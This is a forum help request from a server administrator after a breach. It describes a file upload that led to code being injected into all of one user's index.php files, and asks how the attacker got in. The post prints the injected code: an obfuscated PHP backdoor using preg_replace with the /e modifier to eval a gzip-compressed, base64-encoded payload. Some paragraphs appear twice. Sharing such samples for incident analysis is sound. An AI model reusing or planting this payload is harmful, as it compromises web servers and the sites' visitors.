Hi all,
Last night he faced a hack on one of or servers, someone from russia was able to upload a file to a domain on the server and after that all index.php files of all domains of that user where edited on the top there was a extra code that corrupted the index pages:
aka
In the apache error log i have found this that was the initial file that got uploaded:
it looks to me wget was used to download the file am i correct on this or how did they do it maybe a bug in apache ?
Any help will be apriciated i really need to know how they did it to increase security to avoid in the future
Kind regards
Last night he faced a hack on one of or servers, someone from russia was able to upload a file to a domain on the server and after that all index.php files of all domains of that user where edited on the top there was a extra code that corrupted the index pages:
aka
PHP:
<?php ob_start(); ?>
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfNjtxGDITvAfIOC2MPycWQ1H8SjLzJXjQ7mjhAnAABYozf3s3ix5FWCTbIoTEjdTebZBWLref7fC3z16enj788fXi5t6GP6eVeSx/t5V5u+7PN1dc+xj6Sv5vmPvr81NdNWx+r/9ecvX/139J/W1+bah/l8Nz83Zv58e1zTofnbivNp/Xtrb182p+Wk71ymq/vnHf2x/zN78Tzb/6d4z/bO593tJdO/qXT+X1tPufvPf/qP8/7X/uJb+p+t451sf19Lvf/dYU/2TGQXXu2/Pc9zewYVsaf2fNse8rqNsria21d3fy95mf2TP7bmq+1Ydjm/j4vjmvN7FnggtlLb7lg3MwzfnFmKX6OvZcvxvWbx1cmMOijVo+hXjxWnX/xGrG9eubX8ma2s9XQSN4u8DNha/Z8Wz4a2Ng61dnNbVhMjTwrhnmPMdf9zGx2iEccnP05h831w6cff3i+/3FPv/36KPjsAdYrSW0U1OSO5asfbMm3RJsz+WDUgnsUmTkFAGbPAqwEkADbAmkAKfLNALLh8Eagg5+vtZDIfLF5CczFiZDXQ+JG32dgKy7IaMksJNFik3htvBvwCdDk9+rn2lysecQye46Uk+R+h48V4VPOyKXEMvt+WxviKR8b50MWO9v8N9uNZxUXZG4Q12I3LESqEZ8DFwpGcxO4jZBtJK4MKQf2bY69yJkh0oXcjcS2eQHI5/EQs/lEoYkzyRuH2TYfjeiZAjfBeOCa3D/5W9w3O19ikPE9uR+GhxHd4ldebu6H5uCPcn/1X7MjvF69AMSD1WMR/tddTFVc0YRW8jy6zXIosnjWWSNjoUkiDI08iyOBa4bX5Eucz4jDQH4T4kOOJgRjorbsTOOm8VT1VeAo2JkAVWrBhgRedeAF//nPv9K3R8HPHDg5qDYE1kxiM++KJ1BEn/3gKPoJ9ROhA5y6A5BQKxXe5ACLgGnfoyIYUNiRQm4oWQKMAmGaBySbJDwFEJsnTd1lghSjEyw6hpGpQcLEzUVdo7mPKbrVQreuJHOhC8ycifqKpFfP1eMGU/eiUA4zxXxFWG4UxEIcG6DdUGnIbXsKgFu+EkVdp4NYYl+YFJ/T/CtEKviSiWWkSC/sa3Sg1W0WhM98LQiYRK5BtOR4JUgmniwIIFg01sWeuh5ipqFE16vBoUrHGhCpmY4dQsUeFeLAbYcYtecGRokcbvAibiTkqnGraYiv+dLIq2JCXCo8UHyRl2g2MU+DiybZAodXeDsexP/gjwQL/AvNSoXdqI/NbWs/IhZ2hWHjJoMfLepqhPMSbS/48vnv8uVR8IVEzRChEDhdN8eVqqFwM8YBRyTmfYFsKp4N8jWAXj0BRrLEWiU3sya69QCYmX0FRVs8KZZ4s6GC4kqTuRnoU6ThU/FzUtu7Y+VGUbDX6JbxuaKYUGl1hCBx4nYRPhCTusuVmxCARjfOQfgZxebzSCKHMsu/YS+ECg7CpDghJSYUQ0Kc4xouQqDqmY4ssaFj2m+L3ND1be0U3Ttjj98KiaIYCp8f4kYIdHziYVu5xWd17Ir4NW4OIx1upXAX8nTZu6oKCVsqzsbNiqJv/H/cLhA+3RgC/3G/1T26bTST20FIL+CBKAXPdWUe/V0ZomCIhdvG4/OP63g+fHoIx9XXqDM3xM0azNXHdPwUnV7efnr+13Nye8fPZg3jWy/s7ev6+0/PfK5/fIp7vP3zBm//VPk/f/oO'\x29\x29\x29\x3B","");
?>In the apache error log i have found this that was the initial file that got uploaded:
it looks to me wget was used to download the file am i correct on this or how did they do it maybe a bug in apache ?
Any help will be apriciated i really need to know how they did it to increase security to avoid in the future
Kind regards
